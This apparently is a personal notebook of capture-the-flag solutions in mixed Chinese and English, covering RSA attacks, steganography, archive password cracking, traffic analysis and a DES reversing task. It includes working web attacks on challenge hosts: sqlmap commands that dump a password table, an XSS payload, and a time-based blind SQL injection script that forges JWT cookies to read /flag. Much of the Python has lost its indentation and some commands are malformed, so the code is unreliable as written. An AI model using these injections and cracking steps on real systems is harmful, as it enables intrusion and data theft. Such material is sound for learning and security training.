    return (-b + disc_root) // two_a, (-b - disc_root) // two_a
def getGradualFra(cf):
    """Compute the fraction for every prefix of a continued-fraction term list.

    :param cf: list of continued-fraction terms
    :return: list with one gradualFra() result per prefix, shortest first
    """
    return [gradualFra(cf[:end]) for end in range(1, len(cf) + 1)]
def wienerAttack(e, n):
    """Search the convergents of e / n for a private exponent that factors n.

    This only succeeds for the case Wiener's attack targets, an unusually small
    private exponent; otherwise no convergent passes the checks below.

    :param e: public exponent
    :param n: modulus
    :return: the private exponent d, or None when no convergent fits
    """
    for d, k in getGradualFra(continuedFra(e, n)):
        # e*d - 1 must be an exact multiple of k for (k, d) to be usable.
        if k == 0 or (e * d - 1) % k != 0:
            continue
        phi = (e * d - 1) // k
        # n - phi + 1 equals p + q when phi is the real totient.
        p, q = solve_pq(1, n - phi + 1, n)
        if p * q == n:
            return d
# Challenge parameters: modulus n, public exponent e, ciphertext c. Note that e
# is about as large as n, unlike the small fixed exponents most keys use.
n= 68781015120012754009149819243839432182753699533745468739333557116438115901358573880902197723852823949505376140916570536753019491036629572363854637530919546688901226752085109196549145599781909847664046508960094447692268230516763088293911965638780888720788954194778424857089535187609738198309161969913567107861
e= 54093680529782962282616750547542407544796590039913570980901028264103594185617926725669901283009540557359666956131385125727959502505561517117179644650419753631214251337533961664493198676862110639584202010794500844074619335752668896589407110076134931918634061631574656816488381501901503924226166074238518619869
c= 30443384983816710270001651296607959522389400057103143909277631290995899073895621701281106228069835965181342091582584186637031613250922961166298411359757600825556083868477673357860585539016515776933117915504873987178857740106223631465737111746470236003857656528610755145017342412306680097140732745012583119076
# NOTE(review): wienerAttack() returns None when nothing is found, in which case
# the pow() call below raises a TypeError.
d=wienerAttack(e, n)
# Textbook RSA decryption, then the integer is turned back into bytes and text.
m=pow(c, d, n)
print(libnum.n2s(m).decode())

Windows系统密码

1. open https://www.bejson.com/enc/md5dsc/ decode MD5
2.can get good-luck

二维码

1. cat qr_code.png 发现了4number.txt,还有一些PK值,敏感想到可能隐藏了一个zip压缩包(zip的创始人名字简写为PK)和4number.txt文件
2. binwalk qr_code.png 结果如下,检测出图片中存在压缩包
3. foremost qr_code.png 分离压缩包 进入output 文件夹 有加密的 00000000.zip
4. fcrackzip -b -c 1 -l 4-4 -u 00000000.zip 找到密码为7639 打开.txt 有flag
flag{vjpw_wnoei}
1. hexdump -C qr_code.png
2. binwalk -e qr_code.png 分离压缩包
3. cd qr_code.png.extrackted
4. zip2john 1d7.zip >> hash
5. john hash --show
flag{vjpw_wnoei}
# 隐藏
# hidden.txt是要隐藏的文件, demo.jpg是用来隐藏信息的图片, out.jpg是有隐藏信息的图片
outguess -k "my secret key" -d hidden.txt demo.jpg out.jpg
# 提取
outguess -k "my secret key" -r out.jpg hidden.txt
# 隐藏数据 To embed emb.txt in cvr.jpg
steghide embed -cf cvr.jpg -ef emb.txt
# 提取数据 To extract embedded data from stg.jpg
steghide extract -sf stg.jpg

stxxhxxx

flag:ctf{welcom_to_upc_im}
1. steghide extract -sf stxxhxxx.jpeg
2. cat info

rar

use  rust buuctf::solutions::fcreack_rar().await; to force crack password

Dangerous RSA

def Dangerous_RSA():
e = 0x3
n = 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
c = 0x10652cdfaa6b63f6d7bd1109da08181e500e5643f5b240a9024bfa84d5f2cac9310562978347bb232d63e7289283871efab83d84ff5a7b64a94a79d34cfbd4ef121723ba1f663e514f83f6f01492b4e13e1bb4296d96ea5a353d3bf2edd2f449c03c4a3e995237985a596908adc741f32365
k = 0
while 1:
res = iroot(c+k*n,e)  #c+k*n 开3次方根 能开3次方即可
#print(res)
#res = (mpz(13040004482819713819817340524563023159919305047824600478799740488797710355579494486728991357), True)
if(res[1] == True):
print(libnum.n2s(int(res[0]))) #转为字符串
break
k=k+1
Dangerous_RSA()

RSA flag.enc pub.key

1. openssl rsa -pubin -in pub.key -text -modulus
2. convert to decimal n = int("C0332C5C64AE47182F6C1C876D42336910545A58F7EEFEFC0BCAAF5AF341CCDD",16)
3. factordb 86934482296048119190666062003494800588905656017203025617216654058378322103517
4. p = 285960468890451637935629440372639283459
5. q = 304008741604601924494328155975272418463
6. e = 65537
import gmpy2
import rsa
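# Rebuild the private key from the factors listed in steps 3-5 and decrypt flag.enc.
n = int("C0332C5C64AE47182F6C1C876D42336910545A58F7EEFEFC0BCAAF5AF341CCDD",16)
p = 285960468890451637935629440372639283459
q = 304008741604601924494328155975272418463
e = 65537
# Euler's totient of n = p*q, then d as the inverse of e modulo it.
phin = (q-1)*(p-1)
d = gmpy2.invert(e, phin)
key = rsa.PrivateKey(n, e, int(d), p, q)
# Open read-only ("rb" instead of "rb+"): the ciphertext is never written, and a
# read/write handle fails on write-protected evidence files. The file contents
# also get their own name instead of rebinding the handle `f`.
with open("./flag.enc", "rb") as f:
    ciphertext = f.read()
print(rsa.decrypt(ciphertext, key))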
flag{decrypt_256}

这个压缩包有点麻烦

fcrackzip -b -c 1 -l 6-6 -u attachment.zip =>483279
open windows crack by password-note.txt and 解压flag.zip
bkcrack -C flag.zip -c README.txt -p README.txt
bkcrack -C flag.zip -c flag.jpg -k 060fd5e1 d1f696b7 12655d8d -d flag =>生产flag图片
binwalk flag =>发现有zip
binwalk -e flag =>提出4FC5.zip
imhex 4FC5.zip =>用imhex清除伪密码 14 00 09 改为14 00 00
unzip 4FC5.zip =>可以看到flag

lsbHacking

#solution1
java -jar Stegsolve.jar
open image
data analis
select 0
and save bin flag.png
open CaptfEncoder-ubuntu-20-x64-3.1.2.bin
decode qrcode
#solution2
zsteg flag11.png
zsteg flag11.png -E b1,rgb,lsb,xy > flag1.png
open CaptfEncoder-ubuntu-20-x64-3.1.2.bin
decode qrcode

眼见非实

mv zip z.zip
unzip z.zip
binwalk -e 眼见非实.docx
mv 眼见非实.docx yan.zip
unzip yan.zip
open extreated folder with code search flag

T0p_Gear

https://www.cnblogs.com/ms-study/p/13201030.html

#@ add user for archlinux WSL and login

wsl.exe -d Arch login
user_name:andrew
password:dnr..
# open /etc/sudoers (visudo is the safer editor: it syntax-checks the file before saving) and add this line
nano /etc/sudoers
andrew ALL=(ALL) ALL

use steghide

#显示信息
steghide info demo.png
zsteg -a demo.png

这是类

#  strings AppletMain.class
# The \uXXXX sequences copied from the `strings` output; Python already decodes
# them while parsing this literal.
s = "\u0066\u006c\u0061\u0067\u007b\u0033\u0034\u0038\u0034\u0066\u0038\u0033\u0061\u002d\u0066\u0062\u0035\u0033\u002d\u0034\u0062\u0038\u0031\u002d\u0061\u0033\u0061\u0037\u002d\u0064\u0038\u0062\u0064\u0031\u0039\u0032\u0036\u0036\u0062\u0062\u0033\u007d"
# Round-trip through bytes so any escapes still present as text are resolved too.
raw = s.encode("utf-8")
decoded_s = raw.decode("unicode_escape")
print(decoded_s)
# flag{3484f83a-fb53-4b81-a3a7-d8bd19266bb3}

我藏起来了

css_remove_display_none
zsteg im.png
flag{72a8c48e-5bb0-40ef-b3f0-5543c3b16dfd}

gif提取隐藏信息

convert new_gif.gif -coalesce xx_%05d.png
一个一个看形成的图片能够得到flag

棋盘密码,上古神器

“波利比奥斯棋盘”
“3534315412244543_434145114215_132435231542”

https://www.qqxiuzi.cn/bianma/qipanmima.php

flow_analysis

#convert pcapng to pcap
tshark -F pcap -r ctf.pcapng -w newfile.pcap

getsqlinjection.py

import urllib
import pyshark
# Capture under analysis; only HTTP traffic between the two listed hosts is loaded.
cap_file = '/run/media/andrew/HIKVISION/CTF/ichunqiu_ctf/flow_analysis/ctf.pcapng'
cap = pyshark.FileCapture(cap_file, display_filter='http  && ip.addr == 192.168.61.140 && ip.addr == 192.168.61.1')
# Sentinel returned by getattr() when a packet's http layer has no `time` field.
is_http_request = 'is_http_request'
http_request = []
blind_attack_success = []
# NOTE(review): `import urllib` alone does not guarantee that `urllib.parse` is
# bound; `import urllib.parse` would make the unquote() calls below independent
# of what other modules happen to import — confirm.
for i in range(len([_ for _ in cap])):
    check = getattr(cap[i].http, 'time', is_http_request)
    if check != is_http_request:
        # Keep only packets whose http `time` value exceeds 3 — presumably the
        # slow responses produced by a time-delay injection; verify on the capture.
        if float(cap[i].http.time) > 3:
            # Walk backwards to the frame that this packet names as its request.
            for j in range(i, 0, -1):
                if cap[j].frame_info.number == cap[i].http.request_in:
                    http_request.append((cap[j].frame_info.number, cap[j]))
                    http_request.append((cap[i].frame_info.number, cap[i]))
                    # URL-decoded request body of the matching request.
                    blind_attack_success.append(urllib.parse.unquote(cap[j].http.file_data))
                    print(cap[j].frame_info.number)
                    print(cap[j])
                    print(urllib.parse.unquote(cap[j].http.file_data))
                    # input()
                    print("----")
                    print(cap[i].frame_info.number)
                    print(cap[i])
                    print("----"*3)
                    break
# One decoded request body per line, consumed by getasciicode.py.
with open('output.txt', 'w') as f:
    f.writelines('\n'.join(blind_attack_success))

getasciicode.py

# Read the request bodies saved by getsqlinjection.py, one per line.
file_path = 'output.txt'
with open(file_path, 'r') as f:
    lines = list(f)
# From each line take the text between the second '=' and the following ','.
ascii_digits = []
for line in lines:
    after_second_equals = line.split('=')[2]
    ascii_digits.append(after_second_equals.split(',')[0])
# Each extracted number is a character code; join them into the recovered text.
ascii_letters = ''.join(chr(int(code)) for code in ascii_digits)
print(ascii_letters)

New Swan Stone Castle

sqlmap -u "http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1" --prefix "%22%29" suffix "%23"
sqlmap -u "http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1" --prefix "%22%29" suffix "%23" --current-db
sqlmap -u "http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1" --prefix "%22%29" suffix "%23" -D sql100510013 --tables
sqlmap -u "http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1" --prefix "%22%29" suffix "%23" -D sql100510013 -T password --columns
sqlmap -u "http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1" --prefix "%22%29" suffix "%23" -D sql100510013 -T password -C id --dump
sqlmap -u "http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1" --prefix "%22%29" suffix "%23" -D sql100510013 -T password -C pwd --dump

万国码

file:///usr/share/webapps/cyberchef/index.html#recipe=Unescape_Unicode_Characters('%5C%5Cu')
decode unicode "\u0049\u0063\u0068\u0075\u006e\u0071\u0069\u0075\u007a\u006e\u007a\u006c"
enter value get flag

考考小李

'><script>alert(xx)</script>
把上面的提交能够得到flag
flag{608837f4-bbc5-464c-99ab-7b44016d1ee9}

回旋13踢

xw4n73qm23z rot13
enter value get flag

隐藏的编码

adslkjadsl a ,zmxnc,zmc,zxcopaweqwk;l;l;l;l;l;l;l;l;l;l;l;ldkm,ZGY1czRh==.zxmczxkchzxkhiqewupipsad;l;l;l;l;l;l;l;l;l;l;l;l
base64 -d ZGY1czRh==
enter value get flag

致敬经典

#![allow(unused)]
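/// Decodes the parity-dependent Caesar variant used by this challenge.
///
/// Judging from the challenge picture this is a Caesar cipher whose direction
/// depends on the parity of each letter's ASCII code: letters with an odd code
/// are moved `shift` places forward, letters with an even code `shift` places
/// back. Both directions wrap inside the alphabet and keep the letter's case.
/// Every other character is copied unchanged.
///
/// `shift` is reduced modulo 26. The input and the decoded text are both
/// printed, and the decoded text is returned.
fn caesar_cipher_decode_uniqe(text: &str, shift: u32) -> String {
    println!("{}", text);
    // Reduce once so that all arithmetic below fits comfortably in a u8.
    let step = (shift % 26) as u8;
    let result: String = text
        .chars()
        .map(|c| {
            let base = match c {
                'a'..='z' => b'a',
                'A'..='Z' => b'A',
                _ => return c,
            };
            let code = c as u8;
            let offset = code - base;
            let moved = if code % 2 != 0 {
                (offset + step) % 26
            } else {
                // Adding 26 before subtracting keeps the value non-negative, so
                // letters near the start of the alphabet wrap to its end
                // instead of leaving the letter range.
                (offset + 26 - step) % 26
            };
            (base + moved) as char
        })
        .collect();
    println!("{}", result);
    result
}

fn main() {
    caesar_cipher_decode_uniqe("lrua{1uy3yj9l-yw9u-48j2-uuj8-36h03706y7u7}", 6);
}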

xor 签到题

/// Embeds the challenge file at compile time, XORs it with the repeating key
/// "GAME" and prints the result, decoded lossily as UTF-8.
fn main() {
    let ciphertext: Vec<u8> = include_bytes!("xor GAME.txt").to_vec();
    let key: Vec<u8> = b"GAME".to_vec();
    let plaintext = xor(ciphertext, key);
    let rendered = String::from_utf8_lossy(&plaintext);
    println!("{}", rendered);
}
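/// XORs every byte of `vec` with `key`, repeating the key as often as needed.
///
/// Applying the function twice with the same key returns the original bytes.
/// An empty `key` leaves the input unchanged; the index-based version
/// panicked on the remainder by `key.len()` in that case.
fn xor(vec: Vec<u8>, key: Vec<u8>) -> Vec<u8> {
    if key.is_empty() {
        return vec;
    }
    vec.iter()
        .zip(key.iter().cycle())
        .map(|(byte, k)| byte ^ k)
        .collect()
}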
# Python version of the same repeating-key XOR.
# The file is opened in text mode, so `bytes` holds a str; each character is
# encoded back to UTF-8 before ord(), which only works while the encoding of
# that character is a single byte.
with open("xor GAME.txt", "r") as f:
    bytes = f.read()

game = "GAME"
flag = []
for i, ch in enumerate(bytes):
    key_ch = game[i % len(game)]
    new_b = ord(str(ch).encode('utf-8')) ^ ord(key_ch.encode('utf-8'))
    flag.append(chr(new_b))
print("".join(flag))

CryMisc

import pyminizip
pyminizip.compress(r"jiami.py","",r"jiami.zip","",0)
#用AZPR明文破解
AESencrypt.py 可以得到
n = int("48D6B5DAB6617F21B39AB2F7B14969A7337247CABB417B900AE1D986DB47D971",16)=32945885482421841602167475970472000545315534895409154025267147105384142461297
factordb 32945885482421841602167475970472000545315534895409154025267147105384142461297
import gmpy2
import rsa
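# The modulus is only 256 bits long, which is why its two prime factors could
# simply be looked up (see the factordb line above). A key of this size gives
# no confidentiality: anyone holding the public key can rebuild the private one.
n = 32945885482421841602167475970472000545315534895409154025267147105384142461297
p = 177334994338425644535647498913444186659
q = 185783328357334813222812664416930395483
e = 65537
# With p and q known, the private exponent is the inverse of e modulo phi(n).
phin = (q - 1) * (p - 1)
d = gmpy2.invert(e, phin)
key = rsa.PrivateKey(n, e, int(d), p, q)
# The file is only read, so plain "rb" is enough; "rb+" needed write access too.
with open("./message.encrypted", "rb") as f:
    ciphertext = f.read()
print(rsa.decrypt(ciphertext, key))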

PINTU

from PIL import Image
import os
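# Canvas for the reassembled picture: 4000x2000 pixels on a black background.
pic = Image.new('RGB', (4000, 2000), (0, 0, 0))
# Every entry under ./img is treated as one tile of the puzzle.
img_list = os.listdir('./img')
for name in img_list:
    tile_path = "./img/{}".format(name)
    print(tile_path)
    # Bytes 6 and 8 of the tile file are used as the tile's column and row index.
    # Only the first nine bytes are needed, and the handle is closed right away.
    with open(tile_path, 'rb') as fh:
        header = fh.read(9)
    w, h = header[6], header[8]
    # Column/row indices are scaled by 32 and 18 pixels
    # (presumably the size of one tile -- confirm against the tiles).
    with Image.open(tile_path) as img:
        pic.paste(img, (32 * w, 18 * h))
pic.save("all_image.png")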

tiger

cat png-key.txt | rot47 decode
conda activate py27
python lsb.py extract key.png-stego.png gen.txt 28a217fe
cat gen.txt
unzip -Z flag_1.zip
bkcrack -C flag_1.zip -c information.txt.txt -p information.txt.txt
bkcrack -C flag_1.zip -c flag -k 968eae79 e129f7a6 43893e7a -d flag
qrcli decode flag.png > zero.txt
https://yuanfux.github.io/zero-width-web/ decode content
Owl wvn n xhkm SBWav krttqbu gfq gja jhheu up yljycxjpu, vvtx R jzeh pydv usd zp lalhmk, ic brtkac ya whep{866q3755-t358-5119-txnr-juw666e8099m}, uroa okv!
https://www.guballa.de/vigenere-solver decode vigenere
flag{866d3755-c358-5119-abeb-bda666a8099d}

外太空的秘密

print("q1:{}".format(pow(9,9)))
s=['A','C','G','T','R','N','D','E','G']
cnt=0
for i in range(9):
for j in range(9):
for k in range(9):
for m in range(9):
for n in range(9):
for o in range(9):
for p in range(9):
for q in range(9):
for r in range(9):
_str=s[i]+s[j]+s[k]+s[m]+s[n]+s[o]+s[p]+s[q]+s[r]
cnt+=1
if _str=='AAAARNDEG':
print("q2:{}".format(cnt))
if cnt==1001:
print("q3:{}".format(_str))

rsa256

openssl rsa -pubin -in public.key -text -modulus
e = 65537
int("00c284826149197696792dc7fd3399fc012a98fc54e227ba30350125ac815dc705",16)
factordb 87982816287542607821348020319142008042005562918106976160430773236821410039557
p=274473488606178722897600533120866465659 q=320551236967671239609994506214257226623
import gmpy2
import rsa
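# The modulus printed by openssl is only 256 bits long, so its factors were
# available from factordb (see the lines above). RSA keys of this size provide
# no protection: the private key follows directly from the public one.
n = int("00c284826149197696792dc7fd3399fc012a98fc54e227ba30350125ac815dc705", 16)
p = 274473488606178722897600533120866465659
q = 320551236967671239609994506214257226623
e = 65537
# With p and q known, the private exponent is the inverse of e modulo phi(n).
phin = (q - 1) * (p - 1)
d = gmpy2.invert(e, phin)
key = rsa.PrivateKey(n, e, int(d), p, q)
# The file is only read, so plain "rb" is enough; "rb+" needed write access too.
with open("./message.encrypted", "rb") as f:
    ciphertext = f.read()
print(rsa.decrypt(ciphertext, key))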

ziji

# python2 decomress_zlib.py
# file:///usr/share/webapps/cyberchef/index.html#recipe=From_Hex('None')
# get 1111111000100001101...
# 用01画图1的话(0,0,0),0的话(255,255,255)
# decomress_zlib.py
# 解压zlib
import zlib
import binascii
idat ="789C5D91011280400802BF04FFFF5C75294B5537738A21A27D1E49CFD17DB3937A92E7E603880A6D485100901FB0410153350DE83112EA2D51C54CE2E585B15A2FC78E8872F51C6FC1881882F93D372DEF78E665B0C36C529622A0A45588138833A170A2071DDCD18219DB8C0D465D8B6989719645ED9C11C36AE3ABDAEFCFC0ACF023E77C17C7897667".decode("hex")
result = binascii.hexlify(zlib.decompress(idat))
print(result)
# draw_img.py
# 像素画图
from PIL import Image
import os
import math
# 用01画图1的话(0,0,0),0的话(255,255,255)
bins = "1111111000100001101111111100000101110010110100000110111010100000000010111011011101001000000001011101101110101110110100101110110000010101011011010000011111111010101010101111111000000001011101110000000011010011000001010011101101111010101001000011100000000000101000000001001001101000100111001111011100111100001110111110001100101000110011100001010100011010001111010110000010100010110000011011101100100001110011100100001011111110100000000110101001000111101111111011100001101011011100000100001100110001111010111010001101001111100001011101011000111010011100101110100100111011011000110000010110001101000110001111111011010110111011011"
size = int(math.sqrt(len(bins)))
# create a new image size of size*size pixels and black background
pic = Image.new('RGB',(100,100),(0,0,0))
index = 0
for i in range(size):
for j in range(size):
if bins[index]=="0":
pic.putpixel([j,i],(255,255,255))
index+=1
pic.save("all_image.png")

Xor很心疼你

#***Task
# Python3
from secret import flag
import random
import base64
pool = 'qwertyuiopasdfghjklzxcvbnm1234567890QWERTYUIOPASDFGHJKLZXCVBNM'
r = random.randint(2, 250)
assert flag.startswith('hsctf{')
def generate(length):
return ''.join(random.choices(pool, k=length))
def f(x):
    """Reseed the module-level ``random`` generator with ``x`` and return its next 8 bits.

    The return value is an int in the range 0..255. Because the generator is
    reseeded on every call, the output depends only on ``x``, and any earlier
    state of the global generator is discarded.
    """
    random.seed(x)
    next_byte = random.getrandbits(8)
    return next_byte
def encrypt(plaintext, key):
plaintext = list(map(ord, plaintext))
for _ in range(20):
key = f(key)
assert key != 0
for i in range(len(plaintext)):
key = f(key)
tmp = (key * r) % 251
assert tmp != 0 and key != 0
plaintext[i] = plaintext[i] ^ tmp
plaintext = bytes(plaintext)
return base64.b64encode(plaintext)
m = generate(random.randint(200, 300)) + flag + generate(random.randint(200, 300))
c = encrypt(m, random.getrandbits(128))
print(c)
# b'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'
#***Solution
# Python3
import random
import base64
cc=b'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'
cc=base64.b64decode(cc)
flag = 'hsctf{'
pool = 'qwertyuiopasdfghjklzxcvbnm1234567890QWERTYUIOPASDFGHJKLZXCVBNM'
assert flag.startswith('hsctf{')
def generate(length):
return ''.join(random.choices(pool, k=length))
def f(x):
random.seed(x)
return random.getrandbits(8)
def encrypt(plaintext, key):
plaintext = list(map(ord, plaintext))
for i in range(len(plaintext)):
key = f(key)
tmp = (key * r) % 251
#assert tmp != 0 and key != 0
plaintext[i] = plaintext[i] ^ tmp
plaintext = bytes(plaintext)
return plaintext
def decrypt(ciphertext, key):
    """XOR ``ciphertext`` with the keystream that starts from state ``key``.

    For every byte the state is advanced with ``f`` and the keystream byte is
    ``(state * r) % 251``, where ``r`` is read from module scope. The result is
    returned as ``bytes``.

    Every state produced by ``f`` is an 8-bit value, so the whole keystream is
    fixed by one small state and ``r``. That is why the search loop below only
    has to try 255 states and 249 multipliers: a generator with this little
    state cannot keep a message secret.
    """
    recovered = bytearray()
    for byte in list(ciphertext):
        key = f(key)
        tmp = (key * r) % 251
        recovered.append(byte ^ tmp)
    return bytes(recovered)
for r in range(2,251):
for key in range(1,256):
m = flag
c = encrypt(m, key)
if(c in cc):
print(r)
print(key)
print(c)
print(cc.index(c))
r=187
key=34
pos=247
mm=decrypt(cc[247:],key)
print(mm)

晋升之路

###################Solution
import requests
import time
import json
import hmac
import hashlib
import base64
import urllib
header = {
"alg": "SHA256",
"typ": "JWT",
}
secret_key = 'keyfe7dc29e5e3d3f066e5a8a15ba135259'
def b64_encode(s):
return base64.b64encode(s)
def b64_decode(s):
return base64.b64decode(s)
def encode_(secret, header, payload):
header_json = json.dumps(header,separators=(',', ':'), sort_keys=True)
segments = []
segments.append(b64_encode(header_json))
segments.append(b64_encode(payload))
msg = '.'.join(segments)
hm = hmac.new(secret, msg, digestmod=hashlib.sha256)
hm_base64 = b64_encode(hm.digest())
segments.append(hm_base64)
token = '.'.join(segments)
return token
def change(source):
to=''
for c in source:
to+='\u00'+hex(ord(c))[2:]
return to
headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'}
url='http://eci-2ze1tsbvbckimbhvrqqu.cloudeci1.ichunqiu.com:80/'
flag=''
for i in range(1,50):
left=33
right=128
while right-left!=1:
mid=(left+right)/2
payload="'^(substr((select/**/binary/**/load_file(0x2f666c6167)),{i},1)>binary/**/{mid})/**/and/**/sleep(2)^'".format(i=i,mid=hex(mid))
data='{"data":"0'+change(payload)+'"}'
cookies={
'BestScore':urllib.quote(encode_(secret_key,header,data)),
'CellState':'eyJhbGciOiJTSEEyNTYiLCJ0eXAiOiJKV1QifQ%3D%3D.eyJkYXRhIjoie1wic2NvcmVcIjozNixcImdyaWRcIjp7XCJzaXplXCI6NCxcImNlbGxzXCI6W1t7XCJwb3NpdGlvblwiOntcInJvd1wiOjAsXCJjb2x1bW5cIjowfSxcInZhbHVlXCI6XCJQMlwifSx7XCJwb3NpdGlvblwiOntcInJvd1wiOjAsXCJjb2x1bW5cIjoxfSxcInZhbHVlXCI6XCJQMVwifSx7XCJwb3NpdGlvblwiOntcInJvd1wiOjAsXCJjb2x1bW5cIjoyfSxcInZhbHVlXCI6XCJQMVwifSx7XCJwb3NpdGlvblwiOntcInJvd1wiOjAsXCJjb2x1bW5cIjozfSxcInZhbHVlXCI6XCJQMlwifV0sW3tcInBvc2l0aW9uXCI6e1wicm93XCI6MSxcImNvbHVtblwiOjB9LFwidmFsdWVcIjpcIlAzXCJ9LHtcInBvc2l0aW9uXCI6e1wicm93XCI6MSxcImNvbHVtblwiOjF9LFwidmFsdWVcIjpcIlAyXCJ9LHtcInBvc2l0aW9uXCI6e1wicm93XCI6MSxcImNvbHVtblwiOjJ9LFwidmFsdWVcIjpcIlAyXCJ9LHtcInBvc2l0aW9uXCI6e1wicm93XCI6MSxcImNvbHVtblwiOjN9LFwidmFsdWVcIjpcIlAxXCJ9XSxbe1wicG9zaXRpb25cIjp7XCJyb3dcIjoyLFwiY29sdW1uXCI6MH0sXCJ2YWx1ZVwiOlwiUDJcIn0se1wicG9zaXRpb25cIjp7XCJyb3dcIjoyLFwiY29sdW1uXCI6MX0sXCJ2YWx1ZVwiOlwiUDNcIn0se1wicG9zaXRpb25cIjp7XCJyb3dcIjoyLFwiY29sdW1uXCI6Mn0sXCJ2YWx1ZVwiOlwiUDNcIn0se1wicG9zaXRpb25cIjp7XCJyb3dcIjoyLFwiY29sdW1uXCI6M30sXCJ2YWx1ZVwiOlwiUDJcIn1dLFt7XCJwb3NpdGlvblwiOntcInJvd1wiOjMsXCJjb2x1bW5cIjowfSxcInZhbHVlXCI6XCJQMVwifSx7XCJwb3NpdGlvblwiOntcInJvd1wiOjMsXCJjb2x1bW5cIjoxfSxcInZhbHVlXCI6XCJQMlwifSx7XCJwb3NpdGlvblwiOntcInJvd1wiOjMsXCJjb2x1bW5cIjoyfSxcInZhbHVlXCI6XCJQMlwifSx7XCJwb3NpdGlvblwiOntcInJvd1wiOjMsXCJjb2x1bW5cIjozfSxcInZhbHVlXCI6XCJQM1wifV1dfX0ifQ%3D%3D.N5Z2xi2%2F64lMHNC81TDUZUS2EIlizpCNcFG3p78WOAQ%3D'
}
mid=(left+right)/2
t1=time.time()
requests.get(url,headers=headers,cookies=cookies)
t2=time.time()
if t2-t1 >1:
left=mid
else:
right=mid
print left,right
flag+=chr(right)
print flag
#python2 jinsheng.py

WuHen

分析,程序主动去触发divzero异常,说明有东西隐藏在异常。通过seh去找 start() -> scrt_common_main_seh() -> initterm((_PVFV *)&First, (_PVFV *)&Last); -> 进到First -> sub_7FF781AC1000 -> 7FF781AC2390 发现这里是一个DES算法。rand()是固定

else if ( *(_QWORD *)(v2 + 16) == ptrMessageBoxTimeOutA )
{
v8 = 0;
*(_QWORD *)(a1[1] + 72) = 0i64;
qmemcpy(S1, "鏷-%嫋", 8);
*(_DWORD *)&S1[12] = 0xD8A5EDAC;
*(_DWORD *)&S1[16] = 0x23E71CCB;
*(_DWORD *)&S1[20] = 0x169DDCDA;
*(_DWORD *)&S1[24] = 0x2DFE7A0;
*(_DWORD *)&S1[28] = 0x40CA83C;             // 8CCCBEB06422E7682D258B96ACEDA5D8CB1CE723DADC9D16A0E7DF023CA80C04
KEY[0] = rand();
KEY[1] = rand();
KEY[2] = rand();
KEY[3] = rand();
KEY[4] = rand();
KEY[5] = rand();
KEY[6] = rand();
KEY[7] = rand();
ka = *(_QWORD *)KEY;                        // 2923BE84E16CD6AE
for ( i = 0i64; i != 32; i += 8i64 )
*(_QWORD *)&In1[i] = Des(*(_QWORD *)&In1[i], ka);
for ( j = 0i64; j != 32; ++j )
{
if ( In1[j] != S1[j] )
break;
++v8;
}
if ( v8 == 32 )
*(_QWORD *)(a1[1] + 136) = qword_7FF781AE2C10;
return 0xFFFFFFFFi64;
}

经过超级长的时间调试找到魔改点在循环左移处,改成了左移2,而且这个是小端的传值,都是反向处理一下。

for j in range(step):
t1 = d(tmp1) << 2 & 0xfffffff | d(tmp1) >> 26 & 1
t2 = d(tmp2) << 2 & 0xfffffff | d(tmp2) >> 26 & 1
==> main.py <==
from des import Decryption
key = bytes.fromhex('2923BE84E16CD6AE')[::-1]
enclist = '8CCCBEB06422E7682D258B96ACEDA5D8CB1CE723DADC9D16A0E7DF023CA80C04'
for i in range(0, 64, 16):
enc = bytes.fromhex(enclist[i:i + 16])[::-1]
res = Decryption(enc, key)
print(res[::-1].decode(),end='')
# fa7ac1027c833fb858dfff282c7443f0
==> CreateSubkey.py <==
MaxTime = 16
# 生成子密钥的置换表1,将64位的密钥转换为56位
key_table1 = [57, 49, 41, 33, 25, 17, 9,
1, 58, 50, 42, 34, 26, 18,
10, 2, 59, 51, 43, 35, 27,
19, 11, 3, 60, 52, 44, 36,
63, 55, 47, 39, 31, 23, 15,
7, 62, 54, 46, 38, 30, 22,
14, 6, 61, 53, 45, 37, 29,
21, 13, 5, 28, 20, 12, 4]
# 生成子密钥的置换表2,将56位的密钥转换为48位
key_table2 = [14, 17, 11, 24, 1, 5,
3, 28, 15, 6, 21, 10,
23, 19, 12, 4, 26, 8,
16, 7, 27, 20, 13, 2,
41, 52, 31, 37, 47, 55,
30, 40, 51, 45, 33, 48,
44, 49, 39, 56, 34, 53,
46, 42, 50, 36, 29, 32]
STEP_TABLE = [1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1]
d = lambda x: int(''.join(x), 2)
def Listmove(l, step):
    """Rotate ``l`` left by ``step`` positions and return the result as a new sequence."""
    head, tail = l[:step], l[step:]
    return tail + head
def Subkey(key):  # 生成子密钥
keyresult = []
key0 = [0 for i in range(56)]
for i in range(len(key_table1)):
key0[i] = key[key_table1[i] - 1]
# 生成16个密钥
for i in range(MaxTime):
key1 = [0 for i in range(48)]
# 确定每次左移的步数
step = STEP_TABLE[i]
# if (i == 0 or i == 1 or i == 8 or i == 15):
#     step = 1
# else:
#     step = 2
# 分成两组
tmp1 = key0[0:28]
tmp2 = key0[28:56]
# print(f'round: {i},', hex(int(''.join(tmp1), 2)), hex(int(''.join(tmp2), 2)))
# 循环左移
# tmp1 = Listmove(tmp1, step)
# tmp2 = Listmove(tmp2, step)
for j in range(step):
t1 = d(tmp1) << 2 & 0xfffffff | d(tmp1) >> 26 & 1
t2 = d(tmp2) << 2 & 0xfffffff | d(tmp2) >> 26 & 1
tmp1 = list(f'{t1:028b}')
tmp2 = list(f'{t2:028b}')
# tmp1 = Listmove(tmp1, step*2)
# tmp2 = Listmove(tmp2, step*2)
# 左右连接
key0 = tmp1 + tmp2
# 置换选择
for j in range(len(key_table2)):
key1[j] = key0[key_table2[j] - 1]
# 生成密钥
# log(i, key1, tmp1, tmp2)
keyresult.append(key1)
# 返回的是一个集合包含了每次的密钥
return keyresult
def log(i, key1, tmp1, tmp2):
s = int(''.join(tmp1), 2)
hex1 =int(''.join(tmp2), 2)
hex2 = int(''.join(key1), 2)
print(f'round: {i:02}, {s:08X} {hex1:08X} {hex2:016X}')
==> des.py <==
